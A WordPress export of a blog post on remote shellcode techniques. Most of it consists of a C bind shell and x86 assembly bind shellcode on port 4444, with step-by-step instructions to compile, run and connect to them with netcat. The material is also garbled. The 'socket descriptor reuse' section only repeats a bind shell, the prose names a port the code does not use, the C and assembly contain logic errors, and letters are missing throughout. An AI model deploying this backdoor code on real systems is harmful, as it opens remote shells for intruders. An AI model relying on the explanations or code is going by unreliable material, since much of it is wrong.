{"id":2046,"date":"2025-02-06T14:53:49","date_gmt":"2025-02-06T14:53:49","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=2046"},"modified":"2025-02-06T14:53:49","modified_gmt":"2025-02-06T14:53:49","slug":"port-binding-shellcode-remote-shellcode-2","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=2046","title":{"rendered":"Port Binding Shellcode Remote Shellcode"},"content":{"rendered":"

When a host is exploited remotely, a multitude of options are available to gain access to that particular machine. The first choice is usually to try the execve<\/strong> code to see if it works for that particular server. If that server duplicated the socket descriptors to stdout and stdin, small execve<\/strong> shellcode will work fine. Often, however, this is not the case. This section explores dierent shellcode methodologies that apply to remote vulnerabilities.<\/p>\n

One of the most common shellcodes for remote vulnerabilities binds a shell to a high port. This allows an attacker to create a server on the exploited host that executes a shell when connected to. By far the most primitive technique, this is easy to implement in shellcode. In C, the code to create port binding shellcode.<\/p>\n

Example of how you might implement port binding shellcode functionality in C. This code demonstrates the concepts used in port binding shellcode, although it\u2019s simplified compared to the shellcode directly written in assembly language.<\/p>\n

#include <stdio.h>
\n#include <stdlib.h>
\n#include <sys\/socket.h>
\n#include <netinet\/in.h>
\n#include <unistd.h><\/p>\n

int main() {
\n perror(“Socket creation failed”);<\/p>\n

\/\/ Create a socket
\n int sockfd = socket(AF_INET, SOCK_STREAM, 0);
\n if (sockfd < 0) {
\n exit(EXIT_FAILURE);
\n }<\/p>\n

\/\/ Define the server address structure
\n struct sockaddr_in serv_addr;
\n serv_addr.sin_family = AF_INET;
\n serv_addr.sin_addr.s_addr = INADDR_ANY;
\n serv_addr.sin_port = htons(4444); \/\/ Port 4444 in network byte order<\/p>\n

\/\/ Bind the socket to the server address
\n if (bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
\n perror(“Bind failed”);
\n exit(EXIT_FAILURE);
\n }<\/p>\n

\/\/ Start listening for incoming connections
\n if (listen(sockfd, 5) < 0) {
\n perror(“Listen failed”);
\n exit(EXIT_FAILURE);
\n }<\/p>\n

\/\/ Accept incoming connections
\n int newsockfd = accept(sockfd, NULL, NULL);
\n if (newsockfd < 0) {
\n perror(“Accept failed”);
\n exit(EXIT_FAILURE);
\n }<\/p>\n

\/\/ Redirect standard input, output, and error to the new socket
\n dup2(newsockfd, 0); \/\/ stdin
\n dup2(newsockfd, 1); \/\/ stdout
\n dup2(newsockfd, 2); \/\/ stderr<\/p>\n

\/\/ Execute \/bin\/sh
\n execl(“\/bin\/sh”, “sh”, NULL);<\/p>\n

return 0;
\n}<\/p>\n

In this C code:<\/strong><\/p>\n

We create a socket using socket(AF_INET, SOCK_STREAM, 0) to establish a TCP socket. 2. We defi ne the server address structure (struct sockaddr_in) and bind the socket to port 4444 using bind.<\/strong><\/p>\n

We start listening for incoming connections using listen.<\/p>\n

We accept incoming connections with accept, which creates a new socket for communication with the client.<\/p>\n

We use dup2 to redirect standard input, output, and error to the new socket, e ectively allowing us to communicate with the client.<\/p>\n

Finally, we execute \/bin\/sh<\/strong> using execl to spawn a shell for the attacker to interact with.<\/p>\n

Please note that this C code is for educational purposes and may not work as expected in all environments. Additionally, using such functionality in a real-world scenario should only be done with explicit authorization and for legitimate security testing purposes.<\/p>\n

Run the C code provided, follow these steps:<\/strong><\/p>\n

Open a Text Editor: Open a text editor such as Notepad, VS Code, Sublime Text, or any other editor you prefer.<\/p>\n

Copy the Code: Copy the C code from the previous message and paste it into your text editor.<\/p>\n

Save the File: Save the fi le with a .c extension, such as port_bind.c.<\/p>\n

Compile the Code: Open a terminal or command prompt, navigate to the directory where you saved the .c fi le, and compile the code using a C compiler like GCC. For example:<\/p>\n

gcc -o port_bind port_bind.c<\/strong><\/p>\n

Run the Executable: After compiling successfully, run the executable fi le created by the compiler. If you used the command above, the executable will be named port_bind. Run it using:<\/p>\n

.\/port_bind<\/strong><\/p>\n

Connect to the Port: Once the program is running, it will bind to port 4444 and wait for incoming connections. You can use tools like netcat (nc) or a programming language like Python to connect to this port and interact with the shell.<\/p>\n

Example of connecting to the port using netcat:<\/strong><\/p>\n

nclocalhost4444<\/p>\n

This will establish a connection to the port where your program is listening, and you should see a shell prompt where you can enter commands. Keep in mind that this code creates a backdoor-like functionality and should only be used for educational purposes or with explicit authorization for security testing.<\/p>\n

This code binds a socket to a high port (in this case, 12345) and executes a shell when the<\/strong> connection occurs. This technique is common, but has some problems. If the host being<\/strong> exploited has a firewall with a default deny policy, the attacker will be unable to connect to<\/strong> the shell.<\/strong><\/p>\n

Port binding shellcode is a type of shellcode used in exploit development and penetration testing. It allows an attacker to open a network port on a compromised system, enabling remote access or communication with the system.<\/p>\n

Example of x86 Linux shellcode that performs a port binding operation:<\/p>\n

section .text<\/p>\n

global _start<\/p>\n

_start:<\/p>\n

; Socket syscall (socket(AF_INET, SOCK_STREAM, IPPROTO_IP))
\n xor eax, eax ; Clear EAX register
\n xor ebx, ebx ; Clear EBX register<\/p>\n

push byte 0x6 ; IPPROTO_IP (IP protocol number)
\n push byte 0x1 ; SOCK_STREAM (TCP socket type)
\n push byte 0x2 ; AF_INET (IPv4 family)<\/p>\n

mov al, 0x66 ; Socketcall syscall number for socket
\n mov bl, 0x1 ; Socketcall syscall for socket function
\n int 0x80 ; Call socket syscall<\/p>\n

; Bind syscall (bind(sockfd, &addr, addrlen))
\n mov ebx, eax ; Store socket file descriptor in EBX
\n xor eax, eax ; Clear EAX register<\/p>\n

push eax ; Null byte for terminating string
\n push word 0x5c11 ; Port 4444 in little-endian format
\n push word 0x2 ; AF_INET (IPv4 family)<\/p>\n

mov ecx, esp ; ECX points to the address struct
\n mov al, 0x66 ; Socketcall syscall number for bind
\n mov bl, 0x2 ; Socketcall syscall for bind function
\n int 0x80 ; Call bind syscall<\/p>\n

; Listen syscall (listen(sockfd, backlog))
\n mov al, 0x66 ; Socketcall syscall number for listen
\n mov bl, 0x4 ; Socketcall syscall for listen function
\n int 0x80 ; Call listen syscall<\/p>\n

; Accept syscall (accept(sockfd, addr, addrlen))
\n xor eax, eax ; Clear EAX register
\n mov al, 0x66 ; Socketcall syscall number for accept
\n mov bl, 0x5 ; Socketcall syscall for accept function<\/p>\n

push eax ; Null byte for terminating string
\n push ebx ; Null byte for terminating string
\n mov ecx, esp ; ECX points to the address struct
\n int 0x80 ; Call accept syscall<\/p>\n

; Dup2 loop for standard input, output, and error
\ndup_loop:
\n xor ebx, ebx ; Clear EBX register
\n mov al, 0x3f ; Syscall number for dup2
\n inc ebx ; Increment EBX (file descriptor)
\n int 0x80 ; Call dup2 syscall
\n cmp ebx, 0x2 ; Compare EBX with 2 (stderr)
\n jle dup_loop ; Jump to dup_loop if less than or equal to 2<\/p>\n

; Execute \/bin\/sh
\n xor eax, eax ; Clear EAX register
\n push eax ; Null byte for terminating string
\n push 0x68732f2f ; “hs\/\/” in little-endian format
\n push 0x6e69622f ; “nib\/” in little-endian format<\/p>\n

mov ebx, esp ; Store pointer to “\/bin\/\/sh” string in EBX
\n mov al, 0xb ; Syscall number for execve
\n int 0x80 ; Call execve syscall<\/p>\n

This shellcode performs the following actions:<\/strong><\/p>\n

Calls the socket syscall to create a TCP socket.<\/p>\n

Calls the bind syscall to bind the socket to a specifi ed port (4444 in this case).<\/p>\n

Calls the listen syscall to start listening for incoming connections.<\/p>\n

Calls the accept syscall to accept incoming connections and create a new socket for communication.<\/p>\n

Sets up a loop to duplicate fi le descriptors for standard input, output, and error using the dup2 syscall.<\/p>\n

Executes \/bin\/sh<\/strong> to spawn a shell for the attacker to interact with.<\/p>\n

This shellcode can be injected into a vulnerable program or used as part of an exploit to gain remote access to a compromised system.<\/p>\n

To run the port binding assembly code, you fi rst need to assemble it into an executable format that your system can execute. Since assembly code is platform-specifi c, you\u2019ll<\/p>\n

typically use an assembler like NASM (Netwide Assembler) to convert the assembly code into machine code and then link it into an executable.<\/p>\n

To run a port binding assembly code:<\/strong> <\/p>\n

\n<\/div>\n

Save the Assembly Code: Copy the assembly code provided earlier into a text fi le and save it with a .asm extension, such as port_bind.asm.<\/p>\n

Install NASM: If you don\u2019t have NASM installed, you\u2019ll need to install it. On Ubuntu or Debian-based systems, you can install NASM with the command:<\/p>\n

sudo apt-get install nasm<\/strong><\/p>\n

Assemble the Code: Open a terminal and navigate to the directory where you saved port_bind.asm. Use NASM to assemble the code and generate an object fi le:<\/p>\n

nasm -f elf32 -o port_bind.o port_bind.asm<\/strong><\/p>\n

Replace elf32 with elf64 if you\u2019re targeting a 64-bit system.<\/p>\n

Link the Object File: After generating the object fi le, link it to create an executable binary: ld -m elf_i386 -o port_bind port_bind.o<\/strong><\/p>\n

If you\u2019re targeting a 64-bit system, use elf_x86_64 instead of elf_i386.<\/strong><\/p>\n

Run the Executable: Once the linking process is successful, you can run the port_bind executable:<\/p>\n

.\/port_bind<\/strong><\/p>\n

Connect to the Port: After running the executable, it will bind to the specifi ed port (e.g., port 4444). You can use tools like netcat (nc) or another program to connect to this port and interact with the shell.<\/p>\n

To connect using netcat:<\/strong><\/p>\n

nclocalhost4444<\/p>\n

This will establish a connection to the port where your program is listening, and you should see a shell prompt where you can enter commands.<\/p>\n

Keep in mind that running assembly code directly like this may require proper permissions and could potentially harm your system if the code is malicious or not properly handled. Always exercise caution and use code from trusted sources.<\/p>\n

Socket Descriptor Reuse Shellcode<\/strong> <\/h2>\n

When choosing shellcode for an exploit, you should always assume that a fi rewall with a default deny policy will be in place. In this case, port-binding shellcode is not usually the best choice.<\/p>\n

A better tactic is to recycle the current socket descriptor and utilize that socket instead of creating a new one. In essence, the shellcode iterates through the descriptor table, looking for the correct socket. If the correct socket is found, the descriptors are duplicated and a shell is executed.<\/p>\n

Example of how you implement a socket descriptor reuse functionality in C. This code demonstrates the concept of reusing a socket descriptor to redirect input, output, and error streams to a network socket, allowing for remote shell access.<\/p>\n

#include <stdio.h>
\n#include <stdlib.h>
\n#include <sys\/socket.h>
\n#include <netinet\/in.h>
\n#include <unistd.h><\/p>\n

int main() {
\n \/\/ Create a socket
\n int sockfd = socket(AF_INET, SOCK_STREAM, 0);
\n if (sockfd < 0) {
\n perror(“Socket creation failed”);
\n exit(EXIT_FAILURE);
\n }<\/p>\n

\/\/ Define the server address structure
\n struct sockaddr_in serv_addr;
\n serv_addr.sin_family = AF_INET;
\n serv_addr.sin_addr.s_addr = INADDR_ANY;
\n serv_addr.sin_port = htons(4444); \/\/ Port 4444 in network byte order<\/p>\n

\/\/ Bind the socket to the server address
\n if (bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
\n perror(“Bind failed”);
\n exit(EXIT_FAILURE);
\n }<\/p>\n

\/\/ Start listening for incoming connections
\n if (listen(sockfd, 5) < 0) {
\n perror(“Listen failed”);
\n exit(EXIT_FAILURE);
\n }<\/p>\n

while (1) {
\n \/\/ Accept incoming connections
\n int newsockfd = accept(sockfd, NULL, NULL);
\n if (newsockfd < 0) {
\n perror(“Accept failed”);
\n continue;
\n }<\/p>\n

\/\/ Redirect standard input, output, and error to the new socket
\n dup2(newsockfd, 0); \/\/ stdin
\n dup2(newsockfd, 1); \/\/ stdout
\n dup2(newsockfd, 2); \/\/ stderr<\/p>\n

\/\/ Execute \/bin\/sh
\n execl(“\/bin\/sh”, “sh”, NULL);<\/p>\n

\/\/ Close the new socket (this line is not reached if execl succeeds)
\n close(newsockfd);
\n }<\/p>\n

\/\/ Close the listening socket (this code is unreachable in this example)
\n close(sockfd);<\/p>\n

return 0;
\n}<\/p>\n

In this code:<\/strong><\/p>\n

We create a socket using socket**(AF_INET, SOCK_STREAM, 0)** to establish a TCP socket.<\/p>\n

We defi ne the server address structure (struct sockaddr_in)<\/strong> and bind the socket to port 4444 using bind.<\/strong><\/p>\n

We start listening for incoming connections using listen.<\/strong><\/p>\n

Inside the while<\/strong> loop, we accept incoming connections with accept<\/strong>, which creates a new socket for communication with the client.<\/p>\n

We use dup2<\/strong> to redirect standard input, output, and error to the new socket, e ectively allowing us to communicate with the client.<\/p>\n

Finally, we execute \/bin\/sh<\/strong> using execl<\/strong> to spawn a shell for the attacker to interact with.<\/p>\n

This code continuously listens for incoming connections, accepts them, and spawns a shell for each incoming connection, allowing for remote shell access. <\/p>\n

\u2764\ufe0f If you liked the article,\u00a0like and subscribe<\/strong>\u00a0to my channel\u00a0\u201cCodelivly<\/a>\u201d.<\/strong><\/p>\n

\ud83d\udc4d If you have any questions or if I would like to discuss the described hacking tools in more detail, then\u00a0write in the comments<\/strong>. Your opinion is very important to me!<\/p>","protected":false},"excerpt":{"rendered":"

When a host is exploited remotely, a multitude of options are available to gain access to that particular machine. The first choice is usually to try the execve code to see if it works for that particular server. If that server duplicated the socket descriptors to stdout and stdin, small execve shellcode will work fine. […]<\/p>\n","protected":false},"author":0,"featured_media":1814,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2046","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/2046"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2046"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/2046\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/1814"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2046"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2046"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2046"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}